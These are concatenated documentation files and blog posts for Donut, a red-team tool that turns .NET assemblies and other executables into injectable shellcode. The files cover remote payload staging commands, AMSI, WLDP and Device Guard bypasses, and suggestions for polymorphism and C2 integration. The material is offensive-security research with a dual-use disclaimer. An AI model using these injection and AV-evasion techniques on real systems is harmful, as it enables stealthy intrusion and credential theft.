40 | -m <method | api> Optional method or API name for DLL. (method is required for .NET DLL) | |
41 | -p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon. | |
42 | -r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available. | |
43 | -d <name> AppDomain name to create for .NET. Randomly generated by default. | |
44 | ||
45 | examples: | |
46 | ||
47 | donut -f c2.dll | |
48 | donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll | |
49 | donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/ | |
50 | ||
51 | ``` | |
52 | ||
53 | ### Building Donut | |
54 | ||
55 | Tags have been provided for each release version of donut that contain the compiled executables. | |
56 | ||
57 | * v0.9.2, Bear Claw: | |
58 | * v0.9.2 Beta: https://github.com/TheWover/donut/releases/tag/v0.9.2 | |
59 | * v0.9.1, Apple Fritter: https://github.com/TheWover/donut/releases/tag/v0.9.1 | |
60 | * v0.9, Initial Release: https://github.com/TheWover/donut/releases/tag/v0.9 | |
61 | ||
62 | However, you may also clone and build the source yourself using the provided makefiles. | |
63 | ||
64 | ## Building From Repository | |
65 | ||
66 | From a Windows command prompt or Linux terminal, clone the repository and change to the donut directory. | |
67 | ||
68 | ``` | |
69 | git clone http://github.com/thewover/donut | |
70 | cd donut | |
71 | ``` | |
72 | ||
73 | ## Linux | |
74 | ||
75 | Simply run make to generate an executable, static and dynamic libraries. | |
76 | ||
77 | ``` | |
78 | make | |
79 | make clean | |
80 | make debug | |
81 | ``` | |
82 | ||
83 | ## Windows | |
84 | ||
85 | Start a Microsoft Visual Studio Developer Command Prompt and `` cd `` to donut's directory. The Microsft (non-gcc) Makefile can be specified with ``` -f Makefile.msvc ```. The makefile provides the following commmands to build donut: | |
86 | ||
87 | ``` | |
88 | nmake -f Makefile.msvc | |
89 | nmake clean -f Makefile.msvc | |
90 | nmake debug -f Makefile.msvc | |
91 | ``` | |
92 | ||
93 | ## As a Library | |
94 | ||
95 | donut can be compiled as both dynamic and static libraries for both Linux (*.a* / *.so*) and Windows(*.lib* / *.dll*). It has a simple API that is described in *docs/api.html*. Two exported functions are provided: ``` int DonutCreate(PDONUT_CONFIG c) ``` and ``` int DonutDelete(PDONUT_CONFIG c) ``` . | |
96 | ||
97 | ## As a Python Module | |
98 | ||
99 | Donut can be installed and used as a Python module. To install Donut from your current directory, use pip for Python3. | |
100 | ||
101 | ``` | |
102 | pip install . | |
103 | ``` | |
104 | ||
105 | Otherwise, you may install Donut as a Python module by grabbing it from the PyPi repostiory. | |
106 | ||
107 | ``` | |
108 | pip install donut-shellcode | |
109 | ``` | |
110 | ||
111 | ## As a Template - Rebuilding the shellcode | |
112 | ||
113 | *payload/* contains the in-memory loaders for PE/DLL/VBS/JS/XSL and .NET assemblies, which should successfully compile with both Microsoft Visual Studio and Mingw-w64. Make files have been provided for both compilers which will generate x86-64 shellcode by default unless x86 is supplied as a label to nmake/make. Whenever files in the payload directory have been changed, recompiling for all architectures is recommended before rebuilding donut. | |
114 | ||
115 | ### Microsoft Visual Studio | |
116 | ||
117 | **Due to recent changes in the MSVC compiler, we now only support MSVC versions 2019 and later.** | |
118 | ||
119 | Open the x64 Microsoft Visual Studio build environment, switch to the *payload* directory, and type the following: | |
120 | ||
121 | ``` | |
122 | nmake clean -f Makefile.msvc | |
123 | nmake -f Makefile.msvc | |
124 | ``` | |
125 | ||
126 | This should generate a 64-bit executable (*payload.exe*) from *payload.c*. exe2h will then extract the shellcode from the *.text* segment of the PE file and save it as a C array to *payload_exe_x64.h*. When donut is rebuilt, this new shellcode will be used for all payloads that it generates. | |
127 | ||
128 | To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the payload directory, and type the following: | |
129 | ||
130 | ``` | |
131 | nmake clean -f Makefile.msvc | |
132 | nmake x86 -f Makefile.msvc | |
133 | ``` | |
134 | ||
135 | This will save the shellcode as a C array to *payload_exe_x86.h*. | |
136 | ||
137 | ### Mingw-w64 | |
138 | ||
139 | Assuming you're on Linux and *mingw-w64* has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the *payload* directory and type the following: | |
140 | ||
141 | ``` | |
142 | make clean -f Makefile.mingw | |
143 | make -f Makefile.mingw | |
144 | ``` | |
145 | ||
146 | Once you've recompiled for all architectures, you may rebuild donut. | |
147 | ||
148 | ## Bypasses | |
149 | ||
150 | Donut includes a bypass system for AMSI and other security features. Currently we bypass: | |
151 | ||
152 | * AMSI in .NET v4.8 | |
153 | * Device Guard policy preventing dynamicly generated code from executing | |
154 | ||
155 | You may customize our bypasses or add your own. The bypass logic is defined in payload/bypass.c. | |
156 | ||
157 | Each bypass implements the DisableAMSI fuction with the signature ```BOOL DisableAMSI(PDONUT_INSTANCE inst)```, and comes with a corresponding preprocessor directive. We have several ```#if defined``` blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass is called ```BYPASS_AMSI_A```. If donut is built with that variable defined, then that bypass will be used. | |
158 | ||
159 | Why do it this way? Because it means that only the bypass you are using is built into payload.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using. | |
160 | ||
161 | Another benefit of this design is that you may write your own AMSI bypass. To build Donut with your new bypass, use an ```if defined``` block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined. | |
162 | ||
163 | If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded. | |
164 | ||
165 | Odzhan wrote a [blog post](https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/) on the details of our AMSI bypass research. | |
166 | ||
167 | ### Additional features. | |
168 | ||
169 | These are left as exercises to the reader. I would personally recommend: | |
170 | ||
171 | * Add environmental keying | |
172 | * Make donut polymorphic by obfuscating *payload* every time shellcode is generated | |
173 | * Integrate donut as a module into your favorite RAT/C2 Framework | |
174 | ||
175 | ## Disclaimers | |
176 | ||
177 | * No, we will not update donut to counter signatures or detections by any AV. | |
178 | * We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct. | |
179 | ||
180 | # How it works | |
181 | ||
182 | ## Procedure for Assemblies | |
183 | ||
184 | Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. If necessary, the Assembly is downloaded into memory. Either way, it is decrypted using the Chaskey block cipher. Once the CLR is loaded into the host process, a new AppDomain will be created using a random name unless otherwise specified. Once the AppDomain is ready, the .NET Assembly is loaded through AppDomain.Load_3. Finally, the Entry Point specified by the user is invoked with any specified parameters. | |
185 | ||
186 | The logic above describes how the shellcode generated by donut works. That logic is defined in *payload.exe*. To get the shellcode, *exe2h* extracts the compiled machine code from the *.text* segment in *payload.exe* and saves it as a C array to a C header file. *donut* combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters). | |
187 | ||
188 | Refer to MSDN for documentation on the Undocumented CLR Hosting API: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces | |
189 | ||
190 | For a standalone example of a CLR Host, refer to Casey Smith's AssemblyLoader repo: https://github.com/caseysmithrc/AssemblyLoader | |
191 | ||
192 | Detailed blog posts about how donut works are available at both Odzhan's and TheWover's blogs. Links are at the top of the README. | |
193 | ||
194 | ## Procedure for ActiveScript/XSL | |
195 | ||
196 | The details of how Donut loads scripts and XSL files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/07/21/inmem-exec-script/). | |
197 | ||
198 | ## Procedure for PE Loading | |
199 | ||
200 | The details of how Donut loads PE files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/). | |
201 | ||
202 | ## Components | |
203 | ||
204 | Donut contains the following elements: | |
205 | ||
206 | * donut.c: The source code for the donut payload generator | |
207 | * donut.exe: The compiled payload generator as an EXE | |
208 | * donut.py: The donut payload generator as a Python script *(planned for version 1.0)* | |
209 | * donutmodule.c: The CPython wrapper for Donut. Used by the Python module. | |
210 | * setup.py: The setup file for installing Donut as a Pip Python3 module. | |
211 | * lib/donut.dll, lib/donut.lib: Donut as a dynamic and static library for use in other projects on Windows platform | |
212 | * lib/donut.so, lib/donut.a: Donut as a dynamic and static library for use in other projects on the Linux platform | |
213 | * lib/donut.h: Header file to include if using the static or dynamic libraries in a C/C++ project | |
214 | * payload/payload.c: Main file for the shellcode. | |
215 | * payload/inmem_dotnet.c: In-Memory loader for .NET EXE/DLL assemblies. | |
216 | * payload/inmem_pe.c: In-Memory loader for EXE/DLL files. | |
217 | * payload/inmem_xml.c: In-Memory loader for XSL/XML files. | |
218 | * payload/inmem_script.c: In-Memory loader for VBScript/JScript files. | |
219 | * payload/activescript.c: ActiveScriptSite interface required for in-memory execution of VBS/JS files. | |
220 | * payload/wscript.c: Supports a number of WScript methods that cscript/wscript support. | |
221 | * payload/bypass.c: Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP) | |
222 | * payload/http_client.c: Downloads a module from remote staging server into memory. | |
223 | * payload/peb.c: Used to resolve the address of DLL functions via Process Environment Block (PEB). | |
224 | * payload/clib.c: Replaces common C library functions like memcmp, memcpy and memset. | |
225 | * payload/inject.exe: The compiled C shellcode injector | |
226 | * payload/inject.c: A C shellcode injector that injects payload.bin into a specified process for testing. | |
227 | * payload/runsc.c: A C shellcode runner for testing payload.bin in the simplest manner possible | |
228 | * payload/runsc.exe: The compiled C shellcode runner | |
229 | * payload/exe2h/exe2h.c: Source code for exe2h | |
230 | * payload/exe2h/exe2h.exe: Extracts the useful machine code from payload.exe and saves as array to C header file | |
231 | * encrypt.c: Chaskey 128-bit block cipher in Counter (CTR) mode used for encryption. | |
232 | * hash.c: Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing. | |
233 | ||
234 | # Subprojects | |
235 | ||
236 | There are three companion projects provided with donut: | |
237 | ||
238 | * DemoCreateProcess: A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute. | |
239 | * DonutTest: A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string. | |
240 | * ModuleMonitor: A proof-of-concept tool that detects CLR injection as it is done by tools such as donut and Cobalt Strike's execute-assembly. | |
241 | * ProcessManager: A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded. | |
242 | ||
243 | # Project plan | |
244 | ||
245 | * ~~Create a donut Python C extension that allows users to write Python programs that can use the donut API programmatically. It would be written in C, but exposed as a Python module.~~ | |
246 | * Create a C# version of the generator. | |
247 | * Create a donut.py generator that uses the same command-line parameters as donut.exe. | |
248 | * Add support for HTTP proxies. | |
249 | ~~* Find ways to simplify the shellcode if possible.~~ | |
250 | * Write a blog post on how to integrate donut into your tooling, debug it, customize it, and design payloads that work with it. | |
251 | * ~~Dynamic Calls to DLL functions.~~ | |
252 | * Handle the ProcessExit event from AppDomain using unmanaged code. |
0 | # Python Extension | |
1 | ||
2 | A Python C extension is now available which allows you to dynamically generate donut shellcode in Python. | |
3 | ||
4 | ## Requirements | |
5 | ||
6 | The extension has only been tested in Python 3.7, it shouldn't have any compatibility issues with older 3.X versions of Python. | |
7 | ||
8 | It will ***not*** work in Python 2.x. | |
9 | ||
10 | ## Installing the Extension | |
11 | ||
12 | (Once the extension has been published to PyPi) | |
13 | ``` | |
14 | pip3 install donut-shellcode | |
15 | ``` | |
16 | ||
17 | ## Manually Compiling And Installing the Extension | |
18 | ||
19 | ```bash | |
20 | git clone https://github.com/TheWover/donut && cd donut | |
21 | pip3 install . # or python setup.py install | |
22 | ``` | |
23 | ||
24 | ## Usage | |
25 | ||
26 | The Python extension accepts the same parameters as the main donut executable. | |
27 | ||
28 | Here's a minimalistic example of using the extension: | |
29 | ||
30 | ```python | |
31 | import donut | |
32 | shellcode = donut.create(file="naga.exe", params='https://172.16.164.1/') | |
33 | ``` | |
34 | ||
35 | The ```donut``` module exposes only one function ```create()```, which is used to generate shellcode and accepts both positional and keyword arguments. | |
36 | ||
37 | The only required parameter the ```create()``` function needs is the ```file``` argument which accepts a path to the .NET EXE/DLL or VBS/JS/XSL file to turn into shellcode. | |
38 | ||
39 | ```python | |
40 | import donut | |
41 | ||
42 | shellcode = donut.create( | |
43 | file='naga.exe', # .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory | |
44 | url='http://127.0.0.1', # HTTP server that will host the donut module | |
45 | arch=1, # Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default) | |
46 | bypass=3, # Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default) | |
47 | cls='namespace.class', # Optional class name. (required for .NET DLL) | |
48 | method='method', # Optional method or API name for DLL. (method is required for .NET DLL) | |
49 | params='arg1,arg2', # Optional parameters or command line, separated by comma or semi-colon. | |
50 | runtime='version', # CLR runtime version. MetaHeader used by default or v4.0.30319 if none available | |
51 | appdomain='name' # AppDomain name to create for .NET. Randomly generated by default. | |
52 | ) | |
53 | ``` | |
54 | ||
55 | ## Author | |
56 | ||
57 | The Python extension was written by [@byt3bl33d3r](https://twitter.com/byt3bl33d3r) |
0 | --- | |
1 | layout: post | |
2 | title: Donut v0.9.1 "Apple Fritter" - Dual-Mode Shellcode, AMSI, and More | |
3 | --- | |
4 | ||
5 | *TLDR: Version v0.9.1 "Apple Fritter" of Donut has been released, including dual-mode (AMD64+x86) shellcode, AMSI bypassing for .NET v4.8, automatic version detection of payloads, better support for Program.Main().* | |
6 | ||
7 | # Introduction | |
8 | ||
9 | In case you are unaware, [Donut](https://github.com/TheWover/donut "Donut") is a shellcode generation tool that creates native shellcode payloads from .NET Assemblies. This shellcode may be used to inject the Assembly into arbitrary Windows processes. Given an arbitrary .NET Assembly, parameters, and an entry point (such as Program.Main), it produces position-independent shellcode that loads it from memory. The .NET Assembly can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the .NET Assembly is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the Assembly is loaded through the CLR, the original reference is erased from memory to deter memory scanners. The Assembly is loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains. | |
10 | ||
11 | Today, we released version v0.9.1. The major features include: | |
12 | ||
13 | * Dual-Mode shellcode that can run in either x64 for x86 (WOW64) processes. | |
14 | * Automatic detection of the CLR version required for .NET Assembly payloads. | |
15 | * AMSI bypassing for version .NET 4.8 that ensure all Assemblies can be safely loaded. | |
16 | * Modular system for adding bypasses. Your choide of bypass functionality is compiled into payload.exe based on compiler flags. | |
17 | * Bypass for Device Guard policy preventing execution of dynamically generated .NET code | |
18 | * Better handling of Main functions (Entry Points) that use an object array containing string arrays, rather than an array of strings | |
19 | ||
20 | # Feature Breakdown | |
21 | ||
22 | ## Dual-Mode Shellcode | |
23 | ||
24 | Odzhan knew an old trick for crafting shellcode that can run in either x86 or x64 Windows processes using REX prefixes. We combine the x86 and x64 shellcode with a stub that "detects" the architecture of the process. The layout in memory looks like: | |
25 | ||
26 | ``` | |
27 | -------------------------------------------------- | |
28 | | detection stub | x64 shellcode | x86 shellcode | | |
29 | -------------------------------------------------- | |
30 | ``` | |
31 | ||
32 | And the logic: | |
33 | ||
34 | ```assembly | |
35 | 0x31C0 xor eax, eax // null eax | |
36 | 0x48 dec eax // decrement eax to produce an underflow | |
37 | 0x0F88 js dword x86_code // jump to x86 payload if we are in a WOW64 process | |
38 | <x64_code> // the x64 PIC machine code for the payload | |
39 | <x86_code> // the x86 PIC machine code for the payload | |
40 | ``` | |
41 | ||
42 | There are two ways this code can execute. | |
43 | ||
44 | If the process is WOW64 (x86): | |
45 | ||
46 | 1) ```eax``` will be nulled. | |
47 | 2) ```eax``` will be decremented, resulting in an underflow. | |
48 | 3) Since the sign flag is set from the underflow, the condition for the jump is satisfied. Jump to the x86 shellcode. | |
49 | ||
50 | If the process is x64: | |
51 | ||
52 | 1) ```eax``` will be nulled. | |
53 | 2) ```0x48``` is an REX prefix for the next instruction | |
54 | 3) The previous REX prefix is not valid for the ```js``` instruction. As such, nothing happens. | |
55 | 4) Since the x64 PIC is immediately following the previous instruction in memory, ```eip``` is now pointing at the first instruction in the x64 PIC. It now executes. | |
56 | ||
57 | Starting in the v0.9.1 "Apple Fritter" release, dual-mode shellcode is the default. You may still tell Donut to produce x86 or x64 shellcode, rather than AMD64+x86. | |
58 | ||
59 | Naturally, the dual-mode PIC will be larger than the other options. If the size of the PIC matters, use the version for the particular process you are targeting. Or, have your injector check the architecture of the target process before injecting into it. If not, use the dual-mode version to ensure maximum compatbility with host processes. | |
60 | ||
61 | ## Auto-Detect CLR Version | |
62 | ||
63 | Rather than require the user to specify the CLR version, we now read the headers of the .NET Assembly to determine the appropriate CLR version. | |
64 | ||
65 | The .NET Assembly file format is an extension of the regular [PE Format](https://en.wikipedia.org/wiki/Portable_Executable) used by Windows executables. One of the optional fields used by .NET is the ```IMAGE_COR20_HEADER```, which references a ```STORAGESIGNATURE``` structure containing the version details necessary to load the correct runtime. We check the ```iVersionString``` variable to get the exact version requirement for your Assembly. Please note, the names of these data structures and variables are somewhat arbitrary. I am borrowing [dnSpy's](https://github.com/0xd4d/dnSpy) terminology so that I can show you these two pretty pictures. | |
66 | ||
67 | The relevant layout of the .NET headers in my SafetyKatz DLL as stored on disk: | |
68 | ||
69 | ![_config.yml]({{ site.baseurl }}/images/Apple_Fritter/headers_in_PE.PNG) | |
70 | ||
71 | And what the ```STORAGESIGNATURE``` structure actually looks like: | |
72 | ||
73 | ![_config.yml]({{ site.baseurl }}/images/Apple_Fritter/structured_headers.PNG) | |
74 | ||
75 | If you do not want us to automatically determine the version number, you may still manually specify what version to use with the `-r` flag. | |
76 | ||
77 | ||
78 | ## Main Entry Point | |
79 | ||
80 | The original version of Donut did not handle Main entry points for EXEs well due to the fact that it uses an object array as its function signature rather than a string array. We now correctly handle this so that you don't have to know about the difference. :-) | |
81 | ||
82 | ## AMSI Patching | |
83 | ||
84 | To provide some context, AMSI integration has been added to the new version of the .NET Framework. It has also been ported to [.NET Core](https://github.com/dotnet/coreclr/issues/21370). | |
85 | ||
86 | Specifically, AMSI integration was added to the CLR itself so that any .NET Assemblies loaded from memory will be scanned with ```AmsiScanBuffer``` from ```amsi.dll``` before they are loaded. If the result of ```AmsiScanBuffer``` is anything but ```S_OK``` it will return an ```HRESULT``` error code. This affects everything that loads Assemblies from memory using the CLR, including ```System.Reflection.Assembly.Load```, Donut shellcode, and (presumably if I could test it) Cobalt Strike's ```execute-assembly``` command. | |
87 | ||
88 | When you try to load a .NET Assembly from memory that is known to be malicious, you get a Defender alert that looks like the picture below. Notice that data source was AMSI, and that the process it was running in is ```notepad.exe```. The assembly was injected into notepad through Donut shellcode. | |
89 | ||
90 | ![_config.yml]({{ site.baseurl }}/images/Apple_Fritter/donut_AMSI.PNG) | |
91 | ||
92 | However, their implementation of AMSII integration is subject to memory patching bypasses in the same way that PowerShell is. We developed on existing research, produced some custom bypasses, and added a modular bypass system to Donut that lets you choose which technique you would like to use. | |
93 | ||
94 | Odzhan wrote a [blog post](https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/) detailing each of the AMSI bypasses we added to Donut. It is important to note that there could be many more. I believe that anyone who sits down to do the research and develop an AMSI bypass will probably come up with their own slightly different variant. As long as Microsoft continues to rely on calling DLL functions from user-level memory space, AMSI will be subject to memory patching bypasses. | |
95 | ||
96 | The result looks like the picture below. I safely injected SafetyKatz into ```notepad.exe``` using Donut shellcode, even thought AMSI was used. Defender shows no detections. | |
97 | ||
98 | ![_config.yml]({{ site.baseurl }}/images/Apple_Fritter/amsi_is_dead.PNG) | |
99 | ||
100 | I must strongly emphasize, the fact that 4.8 AMSI can be bypassed like in PowerShell does NOT make it useless. This new AMSI is a *good thing* that will benefit .NET Security. It incurs cost upon adversaries. Use it. But also recognise that, like everything, it has its limitations. | |
101 | ||
102 | ### Modular Bypass System | |
103 | ||
104 | As we researched bypasses for AMSI, it became clear that there is many ways to do it. It would be silly to force users of Donut to have to use whatever we came up with. As such, we ensured that you may easily add your own bypass or customize one of ours. The bypasses are defined in ```payload/bypass.c```. You may either modify our C code, or add your own. Each bypass implements the same ```BOOL DisableAMSI(PDONUT_INSTANCE inst)``` function and is wrapped in an ```#ifdef BYPASS_NAME``` preprocessor directive. To change which bypass is used, change the Makefile to define the bypass name specified by the directive. | |
105 | ||
106 | For example, you could change the relevant line in ```payload/Makefile.msvc``` from | |
107 | ||
108 | ``` | |
109 | cl -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Zp8 -c -nologo -Os -O1 -Gm- -GR- -EHa -Oi -GS- -I ..\include payload.c ..\hash.c ..\encrypt.c bypass.c clib.c | |
110 | ``` | |
111 | ||
112 | To: | |
113 | ||
114 | ``` | |
115 | cl -DBYPASS_AMSI_B -DBYPASS_WLDP_A -Zp8 -c -nologo -Os -O1 -Gm- -GR- -EHa -Oi -GS- -I ..\include payload.c ..\hash.c ..\encrypt.c bypass.c clib.c | |
116 | ``` | |
117 | ||
118 | In order to switch from using BypassA to BypassB. | |
119 | ||
120 | This system not only makes it easy to change the bypass technique, but also reduces the size, complexity, and signaturability of the shellcode by ensuring that code you are not using is present in the PIC to be found by AV/EDR. | |
121 | ||
122 | ## Device Guard Dynamic Code Prevention Bypass | |
123 | ||
124 | Windows Defender Device Guard includes an optional policy for disabling dynamically-generated .NET code from executing. Because it was mixed-in with the AMSI scanning code, we went ahead and disabled it too. Not sure if that will help anyone, but hey it was easy. ¯\_(ツ)_/¯ | |
125 | ||
126 | ![_config.yml]({{ site.baseurl }}/images/Apple_Fritter/code_integrity.png) | |
127 | ||
128 | # Conclusion | |
129 | ||
130 | Donut v0.9.1 "Apple Fritter" represents the first improvements to Donut. More improvements are coming as we have time to make them. In the meantime, Donut is still in Beta so we welcome feedback and testing. | |
131 | ||
132 | I know that several people have already had difficulties integrating Donut into their toolsets because of the complexity of the data structures it uses. To help with this, our plan for the full release (version 1.0) is to produce C# and Python generators. That will be the primary focus of our efforts moving forward. | |
133 | ||
134 | ## Plans | |
135 | ||
136 | Below is the current version release plan for Donut. | |
137 | ||
138 | * v0.9.1: | |
139 | * Dual-Mode shellcode that can run in either x64 for x86 (WOW64) processes. | |
140 | * Automatic detection of the CLR version required for .NET Assembly payloads. | |
141 | * AMSI bypassing for version .NET 4.8 that ensure all Assemblies can be safely loaded. | |
142 | * Modular system for adding bypasses. Your choide of bypass functionality is compiled into payload.exe based on compiler flags. | |
143 | * Bypass for Device Guard policy preventing execution of dynamically generated .NET code | |
144 | * Better handling of Main functions (Entry Points) that use an object array containing string arrays, rather than an array of strings | |
145 | * v1.0: | |
146 | * C# generator | |
147 | * C# wrapper for our dynamic library | |
148 | * Python generator | |
149 | * Python wrapper for our dynamic library | |
150 | * Better documentation for debugging, designing with, and integrating Donut. | |
151 | * v1.1: | |
152 | * Automatic unloading of Application Domains after the Assembly finishes executing. | |
153 | * Support for HTTP proxies |
0 | --- | |
1 | layout: post | |
2 | title: Donut - Injecting .NET Assemblies as Shellcode | |
3 | --- | |
4 | ||
5 | *TLDR: You can now inject .NET Assemblies into Windows processes using this repo: https://github.com/TheWover/donut/* | |
6 | ||
7 | # Advancing Tradecraft - Context | |
8 | ||
9 | Offensive and red team tradecraft have changed significantly in the past year. As anti-malware systems improve their capability to detect and deter offensive tools, attackers are shifting their focus to technologies that are not observed by AV. Currently, that means operating entirely in memory and avoiding dropping files onto disk. In the Windows world, the .NET Framework provides a convenient mechanism for this. It is, however, severely restricted in that .NET programs cannot be injected directly into remote processes. In this article, we will address this issue by describing how to inject .NET code into processes via shellcode. | |
10 | ||
11 | ## .NET Primer | |
12 | ||
13 | Before we begin, you must understand a few important components of .NET. | |
14 | ||
15 | <details> | |
16 | <summary>Click to expand the primer!</summary> | |
17 | ||
18 | * [Common Language Runtime](https://docs.microsoft.com/en-us/dotnet/standard/clr "Common Language Runtime"): Like Java, .NET uses a runtime environment (or "virtual machine") to interpret code at runtime. All .NET Code is compiled from an intermediate language to native code "Just-In-Time" before execution. | |
19 | * [Common Intermediate Language](https://docs.microsoft.com/en-us/dotnet/standard/managed-code "Common Intermediate Language"): Speaking of an intermediate language, .NET uses CIL (also known as MSIL). All .NET languages (of which there are many) are "assembled" to this intermediate language. CIL is a generic object-oriented assembly language that can be interpreted into machine code for any hardware architecture. As such, the designers of .NET languages do not need to design their compilers around the architectures they will run on. Instead, they merely need to design it to compile to one language: CIL. | |
20 | * [.NET Assemblies](https://docs.microsoft.com/en-us/dotnet/framework/app-domains/assemblies-in-the-common-language-runtime ".NET Assemblies"): .NET applications are packaged into .NET Assemblies. They are so called because the code from your language of choice has been "assembled" into CIL but not truly compiled. Assemblies use an extension of the PE format and are represented as either an EXE or a DLL that contains CIL rather than native machine code. | |
21 | * [Application Domains](https://docs.microsoft.com/en-us/dotnet/framework/app-domains/application-domains "Application Domains"): Assemblies are run inside of a safe "box" known as an Application Domain. Multiple Assemblies can exist within an AppDomain, and multiple AppDomains can exist within a process. AppDomains are intended to provide the same level of isolation between executing Assemblies as is normally provided for processes. Threads may move between AppDomains and can share objects through marshalling and delegates. | |
22 | </details> | |
23 | ||
24 | ## Current state of .NET Tradecraft | |
25 | ||
26 | Currently, .NET tradecraft is limited to post-exploitation execution by one of two main ways: | |
27 | ||
28 | * Assembly.Load(): The .NET Framework's standard library includes an API for [code reflection](https://en.wikipedia.org/wiki/Reflection_(computer_programming)). This Reflection API includes System.Reflection.Assembly.Load, which can be used to load .NET programs from memory. In less than five lines of code, you may load a .NET DLL or EXE from memory and execute it. | |
29 | * execute-assembly: In Cobalt Strike 3.11, Raphael Mudge introduced a command called 'execute-assembly' that ran .NET Assemblies from memory as if they were run from disk. This command introduced the world to .NET tradecraft and signalled the shift to [Bringing Your Own Land](https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html). | |
30 | ||
31 | However, both execution vectors produce challenges for red teams seeking to develop flexible TTPs. | |
32 | ||
33 | ## Assembly.Load | |
34 | ||
35 | While the Reflection API is very versatile and can be useful in many different ways, it can only run code in the current process. No support is provided for running payloads in remote processes. | |
36 | ||
37 | ## execute-assembly | |
38 | ||
39 | The main problem with execute-assembly is that it executes the same way every time. That predictability ensures that it is reliable, but also lets defenders built analytics. | |
40 | ||
41 | 1. A subprocess is created using the *spawnto* executable. Mudge refers to this as a "sacrificial process" because it acts as a host for your payloads, isolating your Beacon's process from any failure in your code. | |
42 | 2. A reflective DLL is injected into the subprocess to load the .NET Runtime. | |
43 | 3. The reflective DLL loads an intermediate .NET Assembly to handle errors and improve the stability of your payload. | |
44 | 4. The intermediate .NET Assembly loads your .NET Assembly from memory inside the subprocess. | |
45 | 5. The main entry point of your Assembly is invoked along with your command-line arguments. | |
46 | ||
47 | The result is that execute-assembly *does* allow you to inject your .NET Assembly into a remote process. However, it does not let you inject into a running process or specify how that injection occurs. It is only modular in *what* you can run, not *how* you can run it. The most that you can do is to specify what exceutable is run for your sacrificial subprocess by changing the *spawnto* variable in your Malleable C2 Profile. execute-assembly also has a hidden size limitation of 1 MB for your payloads, which limits your flexibility in designing post-exploitation tools. | |
48 | ||
49 | ## Moving Forward | |
50 | ||
51 | To move past these limitations, we need a technique that meets the following requirements: | |
52 | ||
53 | * Allows you to run .NET code from memory. | |
54 | * Can work with any Windows process, regardless of its architecture and whether it has the CLR loaded. | |
55 | * Allows you to inject that code in either a remote (different) process or the local (current) process. | |
56 | * Allows you to determine in what way that injection occurs. | |
57 | * Works with multiple types of process injection. | |
58 | ||
59 | The most flexible type of payload that meets those requirements is shellcode. But you can't just convert a .NET Assembly to shellcode. They run through a runtime environment, not directly on the hardware. Wouldn't it be great if we could just inject .NET Assemblies as shellcode? Yes. Yes, it would. | |
60 | ||
61 | # Introducing Donut | |
62 | ||
63 | ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/donut.png) | |
64 | ||
65 | ```Shortly before publishing donut, Odzhan and I became aware of another team working on a shellcode generator for .NET Assemblies. They were at the same stage of their project at us. We both agreed that whomever of us published first would ensure that the other received due credit for their work. As soon as they publish their tool, we will update this article with a link.``` | |
66 | ||
67 | Donut is a shellcode generation tool that creates x86 or x64 shellcode payloads from .NET Assemblies. This shellcode may be used to inject the Assembly into arbitrary Windows processes. Given an arbitrary .NET Assembly, parameters, and an entry point (such as Program.Main), it produces position-independent shellcode that loads it from memory. The .NET Assembly can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the .NET Assembly is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the Assembly is loaded through the CLR, the original reference is erased from memory to deter memory scanners. The Assembly is loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains. | |
68 | ||
69 | Donut is currently at version 0.9 (Beta). Please share any issues or suggestions with us as Issues on GitHub. Once we have received feedback, we will release version 1.0. A link to the compiled v0.9 release can be found [here](https://github.com/TheWover/donut "Release 0.9"). | |
70 | ||
71 | # How it Works | |
72 | ||
73 | ## Unmanaged Hosting API | |
74 | ||
75 | Microsoft provides an API known as the [Unmanaged CLR Hosting API](https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/). This API allows for unmanaged code (such as C or C++) to host, inspect, configure, and use Common Language Runtimes. It is a legitimate API that can be used for many purposes. Microsoft uses it for several of their products, and other companies use it to design custom loaders for their programs. It can be used to improve performance of .NET applications, create sandboxes, or just do wierd stuff. We do the latter. | |
76 | ||
